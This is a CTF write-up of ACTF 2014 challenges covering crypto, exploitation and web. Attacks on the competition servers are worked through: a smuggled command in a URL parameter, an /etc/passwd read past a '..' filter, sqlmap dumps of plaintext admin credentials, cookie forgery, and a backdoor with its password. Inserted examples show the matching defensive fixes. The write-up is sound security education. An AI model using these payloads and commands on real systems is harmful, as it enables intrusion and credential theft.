[CTF]ACTF-2014-L-WriteUp

Zhejiang University ACTF 2014, writeup by L.

0x00 RE Reverse0

What about the reversing challenge you promised?

The challenge author hasn't even had breakfast yet, what's the hurry? Out the door, turn left, and go do the Web challenges like a good kid, OK?

Flag: OK

0x01 Ancient CRYPTO100

The flag for this challenge is not wrapped in ACTF{}.

oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?

A monoalphabetic substitution cipher. Solve it with an automated solver:

git clone https://github.com/alexbers/substitution_cipher_solver.git

cd substitution_cipher_solver/

echo "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?" > encrypted.txt

./decrypt.py

Best key: ervglxyzohiqdsnbamfjpwkutc, bad_words 2
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?

FLAG:cryptooosocoolamiright
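To show what the solver's "Best key" actually means, here is an added example (not part of the original writeup and not code from substitution_cipher_solver) that applies the reported key to the ciphertext from the page. The key convention used here is an assumption that the assertions confirm: position i of the key is the plaintext letter standing for the i-th ciphertext letter. The frequency helper shows the classic weakness of such ciphers: the most frequent ciphertext letter maps straight to English "e".

```python
import re
from collections import Counter

# Ciphertext from the challenge and the key printed by substitution_cipher_solver
# ("Best key: ervglxyzohiqdsnbamfjpwkutc").
CIPHERTEXT = (
    "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. "
    "ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy "
    "yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn "
    "uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko "
    "yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea "
    "q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg "
    "ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?"
)
BEST_KEY = "ervglxyzohiqdsnbamfjpwkutc"
ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def decrypt(ciphertext: str, key: str) -> str:
    """Monoalphabetic substitution: key[i] is the plaintext letter that stands for
    ciphertext letter ALPHABET[i] (assumed convention, checked by the asserts).
    Punctuation and spaces pass through unchanged."""
    return ciphertext.translate(str.maketrans(ALPHABET, key))


def letter_frequencies(text: str) -> Counter:
    """Counts of a-z only: the starting point for breaking the cipher by hand."""
    return Counter(ch for ch in text if ch in ALPHABET)


def most_common_letter(text: str) -> str:
    return letter_frequencies(text).most_common(1)[0][0]


def extract_flag(plaintext: str) -> str:
    """The challenge text ends with the flag as its last word."""
    return re.findall(r"[a-z]+", plaintext)[-1]


def solve() -> dict:
    plaintext = decrypt(CIPHERTEXT, BEST_KEY)
    top = most_common_letter(CIPHERTEXT)
    return {
        "plaintext": plaintext,
        "flag": extract_flag(plaintext),
        "top_cipher_letter": top,
        "top_plain_letter": decrypt(top, BEST_KEY),
    }


if __name__ == "__main__":
    result = solve()
    print(result["plaintext"])
    print("FLAG:", result["flag"])
    print("most frequent ciphertext letter %r -> %r" % (result["top_cipher_letter"], result["top_plain_letter"]))
```

The solver searches for exactly this kind of key by scoring candidate plaintexts against an English dictionary, which is why a few hundred characters of ciphertext are enough.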

0x02 Appetizer EXPLOIT100

nc 218.2.197.236 2009

crypto200.tar.gz

A stack overflow: overwrite the saved return address with the address of the game function so that it gets executed.

0x03 Social Engineering MISC100

Rumour has it the losers taking part in ACTF all like hanging out on Tieba :)

On Baidu Tieba, search all forums for ACTF and you find the flag posted by a "test" account. Of course, anyone solving it later probably had a harder time ;-)

0x04 The Road to the Flag Web100

Young man, fancy a go? http://218.2.197.236:2005/index.php

Opening the link shows the hint: Can you GET the way to flag?

Viewing the page source reveals:

<!--way = "H4ck_F0r_Fun!GoGoGo!" -->

So: http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!

0x05 Resentment Over Unobtainable Tickets CRYPTO200

Not being able to buy a TI4 ticket makes life look bleak... crypto200.tar.gz

Following a CTF that had a similar challenge, write a script to recover the key:

http://v0ids3curity.blogspot.com/2014/01/hack-you-ctf-2014-crypto-100-easy-one.html

Recovered key: DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo

Strip the repeated tail, giving DoNotTryToGuessWhatDoesD3AdCa7ThinkOf

Decrypted plaintext of enc2:

High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
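The page does not show the script or the cipher, so the following is an added example (mine, not the writeup's or the referenced blog's code) built on an assumption: that the challenge is a repeating-key stream cipher, modelled here as repeating-key XOR. Both sample messages are constructed from the final plaintext shown above; the real enc1/enc2 files are not on the page. It reproduces the two observations in the writeup: with a known plaintext longer than the key, the recovered keystream comes out longer than one period (the trailing "DoNo"), and the period is found by looking for where the keystream starts repeating.

```python
from itertools import cycle

# Key as recovered in the writeup, after stripping the repeated tail.
KEY = b"DoNotTryToGuessWhatDoesD3AdCa7ThinkOf"

# Constructed sample messages: a line of the recovered plaintext serves as the
# known-plaintext crib, the other stands in for the second encrypted file.
KNOWN_PLAINTEXT = (b"Search again for these tickets (a fan may have let them go) "
                   b"or change quantity/ticket type.")
SECRET = b"Get This damn fl4g plz"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, plaintext: bytes) -> bytes:
    """c = p ^ k, so k = c ^ p wherever the plaintext is known."""
    return bytes(c ^ p for c, p in zip(ciphertext, plaintext))


def find_period(keystream: bytes, max_period: int = 64):
    """Smallest p such that keystream[i] == keystream[i + p] for every i.
    Only periods up to half the keystream length are trustworthy."""
    for p in range(1, min(max_period, len(keystream) // 2) + 1):
        if all(keystream[i] == keystream[i + p] for i in range(len(keystream) - p)):
            return p
    return None


def recover_key(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Keystream truncated to one period: the 'remove the repeat' step."""
    ks = recover_keystream(ciphertext, plaintext)
    p = find_period(ks)
    return ks if p is None else ks[:p]


def demo() -> dict:
    enc1 = xor_repeating(KNOWN_PLAINTEXT, KEY)   # file with known contents
    enc2 = xor_repeating(SECRET, KEY)            # file holding the flag
    ks = recover_keystream(enc1, KNOWN_PLAINTEXT)
    key = recover_key(enc1, KNOWN_PLAINTEXT)
    return {
        "keystream_len": len(ks),        # longer than the key: two periods plus a tail
        "period": find_period(ks),
        "key": key,
        "enc2_plain": xor_repeating(enc2, key),
    }


if __name__ == "__main__":
    r = demo()
    print("keystream bytes:", r["keystream_len"], "period:", r["period"])
    print("key:", r["key"].decode())
    print("enc2:", r["enc2_plain"].decode())
```

The defender's lesson is the same whatever the exact operation was: a key reused across two files lets anyone with one known plaintext strip the key off the other.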

0x06 Kill the Pig, Eat the Meat EXPLOIT200

nc 218.2.197.236 2010

crypto200.tar.gz

Pulling the program into IDA, you find four recognised commands:

killPig (note the trailing space)

On this command the program first allocates an 8-byte buffer and stores its address in cs:auth. It then checks whether the string after "killPig " is longer than 0x1E bytes; if not, it copies 8 bytes of that string into the buffer, otherwise it skips the copy.

reset

Frees the buffer whose address is stored in cs:auth.

feedPig

Allocates a new buffer for the string following feedPig and stores its address in cs:service.

EatIt

Obviously the command that yields the key. But it is guarded by a check: if the byte at (address stored in cs:auth) + 0x20 is non-zero, the key is printed; otherwise it is skipped.

So the crux is to get something at cs:auth + 0x20.

Plain "killPig " + string doesn't work because of the length limit.
The author probably intended: killPig first, reset to free that buffer, then feedPig to reuse that chunk with a string longer than 0x20 bytes.

But it turned out that simply issuing feedPig after killPig places the new allocation exactly 0x20 bytes past the first one, which does the job ;-) (This is what you would expect from glibc malloc on x86-64, where the smallest chunk is 0x20 bytes, so the user data of the allocation made right after an 8-byte one starts exactly 0x20 bytes later.)

0x07 The Annoying Admin WEB200

The FLAG is in admin's hands! http://218.2.197.236:2005/web200/index.php

At the start the challenge had a bug: any username and password got you the logged-in page.

The response headers revealed a "Real" address; visit it. It is admin-only, so set the cookie admin=1.

Got the flag.

Because of the initial bug I went off track, concentrating on SQL injection in the login form, but I could not dump any data from the username and password columns of the web100.admin table; the organisers later patched the bug.
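The admin=1 cookie works because the server trusts a client-supplied flag as its authorisation decision. As an added example (my code, not the challenge's), the following contrasts that pattern with a session cookie whose claims are protected by an HMAC, so editing the payload client-side invalidates it. The secret, claim names and cookie layout are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json

SERVER_SECRET = b"constructed-demo-secret-rotate-in-production"   # constructed


def _b64encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_cookie(claims: dict, secret: bytes = SERVER_SECRET) -> str:
    """payload.tag where tag = HMAC-SHA256(secret, payload)."""
    payload = _b64encode(json.dumps(claims, sort_keys=True).encode())
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(cookie: str, secret: bytes = SERVER_SECRET):
    """Return the claims if the tag is valid, otherwise None."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return json.loads(_b64decode(payload))


def is_admin_naive(cookies: dict) -> bool:
    """The pattern the challenge exhibits: believe whatever the client sends."""
    return cookies.get("admin") == "1"


def is_admin_signed(cookies: dict) -> bool:
    """Only a claim that carries a valid tag counts."""
    claims = verify_cookie(cookies.get("session", ""))
    return claims is not None and claims.get("admin") is True


def tamper_admin(cookie: str) -> str:
    """What an attacker can do client-side: flip the claim, keep the old tag."""
    payload, tag = cookie.rsplit(".", 1)
    claims = json.loads(_b64decode(payload))
    claims["admin"] = True
    return _b64encode(json.dumps(claims, sort_keys=True).encode()) + "." + tag


if __name__ == "__main__":
    user_cookie = issue_cookie({"user": "alice", "admin": False})
    print("naive check with admin=1:", is_admin_naive({"admin": "1"}))
    print("signed check, genuine user cookie:", is_admin_signed({"session": user_cookie}))
    print("signed check, tampered cookie:", is_admin_signed({"session": tamper_admin(user_cookie)}))
```

A signed cookie still needs the secret kept server-side and an expiry claim in practice; the point here is only that the authorisation bit must not be something the browser can set.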

0x08 S4ndb0x MISC300

Enumerated it the laborious way: because of the time limit, I sent requests with Burp at roughly one every 32 seconds and enumerated the flag, using the snippet below, which returns the first character of its argument minus 'A' as the process exit status, so each run leaks one character:

int main(int argc, char **argv, char *i)
{
return i=*++argv, i=i+0, *i - 'A';
}

ACTF{c6e49c9b897cc4dba15b39ec53bd8fd681937b8ae16833a24090f27d71d3f8c5}

0x09 Meow Meow Meow Meow WEB300

Admin Xiao Lu set up a server, but it seems to have quite a few holes.

http://218.2.197.236:2001/index.html

At first nothing stood out; eventually a tiny line in About:

This doubi web blog layout is provided by ./bc

Visiting the bc directory, one link has an arbitrary file read, although it filters out "..":

<?php
$url = $_GET['uuu'];
$url = str_replace("..", "", $url);   // only deletes the literal "..", does not confine the path
$file = fopen("$url", "r") or exit("Unable to open file!");
// Output a line of the file until the end is reached
while (!feof($file)) {
    echo fgets($file) . "\n";
}
fclose($file);
?>

Reading /etc/passwd reveals HINT:x:500:500::/usr/share/ngInx/html:/bin/bash, which gives the web root and lets us read the site's login.php.
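The filter in that PHP only removes the characters ".." and never checks where the resulting path points, which is why an absolute path such as /etc/passwd is read without any trick. As an added example (my code, not the challenge's), here is the check a file-serving endpoint should make instead: resolve the requested path against a fixed base directory and refuse anything that ends up outside it. The demo web root is a constructed temporary directory.

```python
import os
import tempfile


def strip_dotdot(user_path: str) -> str:
    """Mirror of the page's str_replace("..", "", $url). It only deletes the
    literal "..", so an absolute path like /etc/passwd passes through untouched."""
    return user_path.replace("..", "")


def resolve_under_base(base_dir: str, user_path: str):
    """Real path of user_path if it lies inside base_dir, otherwise None.
    realpath() normalises '..' and follows symlinks before the containment check,
    and os.path.join() discards base_dir when user_path is absolute, so the
    check catches that case too."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def read_file_safely(base_dir: str, user_path: str):
    """Serve only regular files located under base_dir."""
    path = resolve_under_base(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


def make_demo_root() -> str:
    """Constructed web root: a temp dir holding one public file."""
    root = tempfile.mkdtemp(prefix="bc_demo_")
    with open(os.path.join(root, "about.txt"), "w", encoding="utf-8") as fh:
        fh.write("This doubi web blog layout is provided by ./bc\n")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    for requested in ("about.txt", "/etc/passwd", "../../etc/passwd"):
        print("naive filter leaves: %r" % strip_dotdot(requested))
        print("safe read of %r -> %r" % (requested, read_file_safely(root, requested)))
```

The containment check is on the resolved path, not on the string the client sent; string-level filters like the str_replace above are not a substitute.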

login.php has a SRUN3000-style command execution: ?gongwan=1|ls > /tmp/x lists the directory.

Reading DBINFO yields the flag:

<?php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long 
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session 
$dbhost = "localhost"; 
$dbname = "FLAG"; // mysql database name 
$dbuser = "FLAG"; // mysql database username 
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password 
$pre = "onecms_"; // prefix for onecms tables 
?> 

0x0A Big Brother aay's Secret CRYPTO400

Big Brother aay gave you a mysterious file; do what you will with it: flag.rar

An encrypted RAR archive; every file inside is 5 bytes long, and the CRC values are visible.

Saving ACTF{ as 1.txt and compressing it with encryption produced the same CRC, which confirmed the approach: brute-force the 5-byte contents from each CRC.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

typedef uint32_t UINT;   /* originally from <windows.h>; stdint keeps the code portable */
typedef uint8_t  UCHAR;

UINT crc32(UCHAR *buf, int len);

static UINT CRC32[256];
static char init = 0;

/* build the CRC-32 lookup table (reflected polynomial 0xEDB88320) */
static void init_table(void)
{
    int  i, j;
    UINT crc;
    for (i = 0; i < 256; i++)
    {
        crc = i;
        for (j = 0; j < 8; j++)
        {
            if (crc & 1)
                crc = (crc >> 1) ^ 0xEDB88320;
            else
                crc = crc >> 1;
        }
        CRC32[i] = crc;
    }
}

/* standard CRC-32 as used by zlib, zip and RAR */
UINT crc32(UCHAR *buf, int len)
{
    UINT ret = 0xFFFFFFFF;
    int  i;
    if (!init)
    {
        init_table();
        init = 1;
    }
    for (i = 0; i < len; i++)
        ret = CRC32[(ret & 0xFF) ^ buf[i]] ^ (ret >> 8);
    return ~ret;
}

int main(void)
{
    /* candidate alphabet (67 symbols); every 5-byte combination is tried */
    const char ss[] = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
    const size_t n = strlen(ss);
    char sss[6] = {0};
    size_t a, b, c, d, e;
    UINT _crc32 = 0;

    for (a = 0; a < n; a++)
    {
        for (b = 0; b < n; b++)
        {
            for (c = 0; c < n; c++)
            {
                for (d = 0; d < n; d++)
                {
                    for (e = 0; e < n; e++)
                    {
                        sss[0] = ss[a];
                        sss[1] = ss[b];
                        sss[2] = ss[c];
                        sss[3] = ss[d];
                        sss[4] = ss[e];

                        _crc32 = crc32((UCHAR *)sss, 5);

                        /* 0xCA2AA4DE is the CRC shown in the archive for the file being attacked */
                        if (_crc32 == 0xCA2AA4DE)
                        {
                            printf("%s\n", sss);
                            system("PAUSE");   /* Windows-only pause so each hit can be read */
                        }
                    }
                }
            }
        }
    }

    return 0;
}

CRC-32 collisions do occur, but fortunately the final flag can be settled from the meaning of the text.
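The collisions are not bad luck: the search space here (67 symbols, 5 positions) is about 1.35 billion candidates against a 32-bit checksum, so roughly a third of the files can be expected to yield a second, wrong 5-byte preimage. As an added example (my code, not the writeup's), the following re-implements the same table-driven CRC-32 in Python, cross-checks it against zlib, and generalises the brute force to any target and length; the searched length is kept at 3 so it runs in well under a second. The sample target is constructed from a string of my choosing.

```python
import zlib
from itertools import product

# Same 67-symbol alphabet as the C program on the page.
ALPHABET = b"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! "


def make_table():
    """CRC-32 lookup table, reflected polynomial 0xEDB88320 (as in the C code)."""
    table = []
    for i in range(256):
        crc = i
        for _ in range(8):
            crc = (crc >> 1) ^ 0xEDB88320 if crc & 1 else crc >> 1
        table.append(crc)
    return table


TABLE = make_table()


def crc32(data: bytes) -> int:
    """Table-driven CRC-32; matches zlib.crc32 and the CRC stored by RAR/ZIP."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def find_preimages(target: int, length: int, alphabet: bytes = ALPHABET):
    """Every string of `length` symbols from `alphabet` whose CRC-32 equals target.
    Uses zlib for speed; the search is exhaustive, so it returns all collisions."""
    hits = []
    for combo in product(alphabet, repeat=length):
        cand = bytes(combo)
        if zlib.crc32(cand) == target:
            hits.append(cand)
    return hits


def expected_false_matches(length: int, alphabet: bytes = ALPHABET) -> float:
    """Expected number of wrong candidates sharing the target CRC:
    candidates / 2^32. For length 5 this is about 0.31 per file."""
    return len(alphabet) ** length / 2 ** 32


if __name__ == "__main__":
    # constructed target: the CRC of a 3-symbol string we know
    target = zlib.crc32(b"AC!")
    print("preimages of 0x%08X:" % target, find_preimages(target, 3))
    print("expected spurious matches at length 5: %.2f" % expected_false_matches(5))
```

Because a CRC is linear and only 32 bits wide, it is an integrity check against accidental corruption, not a commitment to the contents; RAR's unencrypted CRC over a 5-byte file is effectively a plaintext oracle.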

0x0B Sponsors MISC400

Everybody come look at the sponsors! hidden.png

After some Photoshop work on the downloaded image the outline of a QR code was already clear. Comparing it with the image on the official site, the pixels are identical apart from the QR code, so a Python script diffs the two images to produce the QR code.

The QR code is Version 3, 29x29; the three finder patterns are fine, but the image is still missing one row and one column at the bottom right, which gives 2^17 possibilities.

I really did generate those 170k QR images and batch-scanned them with a script; because of a problem in the script there was no result, but I learned the QR code structure along the way.

Structure reference: http://en.wikipedia.org/wiki/QR_code

The bottom right contains an alignment pattern that does not affect the data, so those modules can be set black (1); excluding those 9 points leaves 2^8 = 256 possibilities, generated in bulk:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from PIL import Image

def showQRCode(fpath, bit, a):
    # fpath: hidden.png (the sponsor image); logo.jpg: the image from the official site
    bmp = Image.open(fpath)
    bmp2 = Image.open('logo.jpg')
    pix = bmp.load()
    pix2 = bmp2.load()
    w, h = bmp.size
    i = 0
    for x in range(0, w):
        for y in range(0, h):
            # pixels equal to the official image are background (white),
            # pixels that differ are QR modules (black)
            if pix[x, y] == pix2[x, y]:
                pix[x, y] = (255, 255, 255)
            else:
                pix[x, y] = (0, 0, 0)
            # part of the missing row/column that is fixed to black (alignment pattern area)
            if (x == 21 and 21 <= y <= 25) or (21 <= x <= 25 and y == 21):
                pix[x, y] = (0, 0, 0)
            # the remaining 8 unknown modules are filled from the candidate bit string
            if (x == 21 and 26 <= y <= 29) or (26 <= x <= 29 and y == 21):
                if int(bit[i]) == 0:
                    pix[x, y] = (255, 255, 255)
                else:
                    pix[x, y] = (0, 0, 0)
                i += 1
    bmp.save('test' + a + '.png')

if __name__ == "__main__":
    # passdic.list holds the 256 eight-bit strings 00000000 .. 11111111, one per line
    for a in open('passdic.list'):
        a = a.rstrip()
        showQRCode("hidden.png", a, a)

Batch recognition again turned up nothing. By then it was the small hours, so I picked up my smartphone and wearily scanned them one by one. First pass: nothing. Second pass, and just as my arm was giving out, one scanned! Finding a reliable recognition script up front and batch-processing with it would have been better.

The file that decoded was test11010100.

0x0C Gongwan-chan WEB400

If you didn't solve web300 you don't have much hope here; who do you think you are, the adorable Gongwan-chan? ( つ•̀ω•́)つ

(Does Gongwan-chan even count as a hint?)

(Neither web300 nor web400 requires a scanner)

(The flag for this challenge is not in ACTF form, and the flag you submit must not contain brackets of any kind)

http://218.2.197.236:2003

Intelligence that can now be disclosed:

The admin is a lazy person; his notes contain almost no filler.

Following the hint, the command execution and file read from web300 turn up this note:

Visit this address on Web400:

From the note there is basically an injection. Judging by what this page looked like I went off track again toward MongoDB; after a painful slog it finally clicked that the Base64 was not telling us gw but hinting at the injection! --

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 -D raw_admin -T admin --dump

Database: raw_admin
Table: admin
[3 entries]
+--------------------+-----------------+
| login              | password        |
+--------------------+-----------------+
| gw                 | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288       |
| luyuhaoxiaodaibi   | luyuhaodadaibi  |
+--------------------+-----------------+

With this dumped, we know 906239288 is the "goddess" from the note.

A Baidu search turned up http://www.baidu.com/p/%E8%92%B2%E8%91%B5%E9%A6%99%E7%AF%86301?from=zhidao, nothing useful.

Weibo had information:
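The tamper script only base64-encodes sqlmap's payloads; the application decodes the parameter and then builds its query from the result, so the encoding layer is no protection at all. As an added example (my code, not the challenge's), the following shows that vulnerable pattern beside a parameterised query on an in-memory SQLite table with constructed rows. The `admin` table and its contents here are placeholders, not the dumped data; note also that the real dump shows passwords stored in clear, which is the second defect worth fixing.

```python
import base64
import sqlite3

TAUTOLOGY = "' OR '1'='1"   # the textbook probe sqlmap starts from


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for raw_admin.admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (login TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('gw', 'constructed-password')")
    conn.commit()
    return conn


def encode_param(value: str) -> str:
    """What --tamper base64encode.py does to each payload."""
    return base64.b64encode(value.encode()).decode()


def decode_param(value: str) -> str:
    return base64.b64decode(value).decode("utf-8", "replace")


def login_vulnerable(conn: sqlite3.Connection, password_b64: str):
    """Decoding the parameter and concatenating it into SQL: the decoded text
    becomes part of the statement, so the encoding changes nothing."""
    pw = decode_param(password_b64)
    sql = f"SELECT login FROM admin WHERE password = '{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, password_b64: str):
    """Parameter binding: the decoded text is data, never SQL."""
    pw = decode_param(password_b64)
    row = conn.execute("SELECT login FROM admin WHERE password = ?", (pw,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    probe = encode_param(TAUTOLOGY)
    print("vulnerable login with injected password:", login_vulnerable(conn, probe))
    print("safe login with the same input:", login_safe(conn, probe))
    print("safe login with the real password:", login_safe(conn, encode_param("constructed-password")))
```

In a real application the stored value would be a password hash compared after a lookup by login, but the binding rule is the same for every query that carries client data.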

So, the backdoor: http://218.2.197.236:2003/Fuckingluyuhao.php with password wangbiyun

It is an alias backdoor, probably placed under /var/tmp/

Got the flag.

0x0D The Deranged Hacker WEB500

Admin Xiao Lu's server got owned (see web300) and the boss chewed him out. The boss then ordered him to set it up again, so Xiao Lu rebuilt the web300 site on a different stack (the original was nginx) somewhere on an internal network and patched some of the holes. Both the boss and Xiao Lu are users on that server, so whenever the boss catches Xiao Lu writing vulnerable code again, he records it on the server right away.

Take up the challenge, hackers, and own this internal server whose location is unknown!!!

(This challenge is closely tied to the earlier web challenges!!!)

(Some key files are reset every ten minutes!!!)

(The flag contains no ACTF text and no brackets of any kind!!!)

(Drink All The Booze , Hack All The Things!!!)

Step one: locate the server.

From the hints, one can guess it is related to WEB300.

Using the WEB300 vulnerabilities, the WEB300 server's information is collected as follows:

Linux gamebox 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux 


eth0 Link encap:Ethernet HWaddr 00:0C:29:7A:61:32 
inet addr:172.17.1.2 Bcast:172.17.1.7 Mask:255.255.255.248 
inet6 addr: fe80::20c:29ff:fe7a:6132/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:8322561 errors:0 dropped:0 overruns:0 frame:0 
TX packets:7889370 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:969748319 (924.8 MiB) TX bytes:9273711147 (8.6 GiB) 

lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:16436 Metric:1 
RX packets:13053905 errors:0 dropped:0 overruns:0 frame:0 
TX packets:13053905 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:41653303424 (38.7 GiB) TX bytes:41653303424 (38.7 GiB) 


Active Internet connections (only servers) 
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2130/nginx 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:55129 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 515/php-fpm 
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - 
tcp 0 0 :::51855 :::* LISTEN - 
tcp 0 0 :::111 :::* LISTEN - 
tcp 0 0 :::22 :::* LISTEN - 
tcp 0 0 ::1:631 :::* LISTEN - 
tcp 0 0 ::1:25 :::* LISTEN - 
udp 0 0 0.0.0.0:111 0.0.0.0:* - 
udp 0 0 0.0.0.0:631 0.0.0.0:* - 
udp 0 0 0.0.0.0:636 0.0.0.0:* - 
udp 0 0 0.0.0.0:895 0.0.0.0:* - 
udp 0 0 0.0.0.0:45324 0.0.0.0:* - 
udp 0 0 0.0.0.0:914 0.0.0.0:* - 
udp 0 0 0.0.0.0:68 0.0.0.0:* - 
udp 0 0 :::111 :::* - 
udp 0 0 :::37369 :::* - 
udp 0 0 :::895 :::* - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 1080 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
Active UNIX domain sockets (only servers) 
Proto RefCnt Flags Type State I-Node PID/Program name Path 
unix 2 [ ACC ] STREAM LISTENING 11013 - @/var/run/hald/dbus-J7oPQkOOJW 
unix 2 [ ACC ] STREAM LISTENING 10583 - /var/run/rpcbind.sock 
unix 2 [ ACC ] STREAM LISTENING 7281 - @/com/ubuntu/upstart 
unix 2 [ ACC ] STREAM LISTENING 10856 - /var/run/dbus/system_bus_socket 
unix 2 [ ACC ] STREAM LISTENING 10917 - /var/run/cups/cups.sock 
unix 2 [ ACC ] STREAM LISTENING 10977 - /var/run/acpid.socket 
unix 2 [ ACC ] STREAM LISTENING 12567 - public/cleanup 
unix 2 [ ACC ] STREAM LISTENING 11008 - @/var/run/hald/dbus-6ghIWFnai8 
unix 2 [ ACC ] STREAM LISTENING 12574 - private/tlsmgr 
unix 2 [ ACC ] STREAM LISTENING 12578 - private/rewrite 
unix 2 [ ACC ] STREAM LISTENING 12582 - private/bounce 
unix 2 [ ACC ] STREAM LISTENING 12586 - private/defer 
unix 2 [ ACC ] STREAM LISTENING 12590 - private/trace 
unix 2 [ ACC ] STREAM LISTENING 12594 - private/verify 
unix 2 [ ACC ] STREAM LISTENING 12598 - public/flush 
unix 2 [ ACC ] STREAM LISTENING 12602 - private/proxymap 
unix 2 [ ACC ] STREAM LISTENING 12606 - private/proxywrite 
unix 2 [ ACC ] STREAM LISTENING 12610 - private/smtp 
unix 2 [ ACC ] STREAM LISTENING 12614 - private/relay 
unix 2 [ ACC ] STREAM LISTENING 12618 - public/showq 
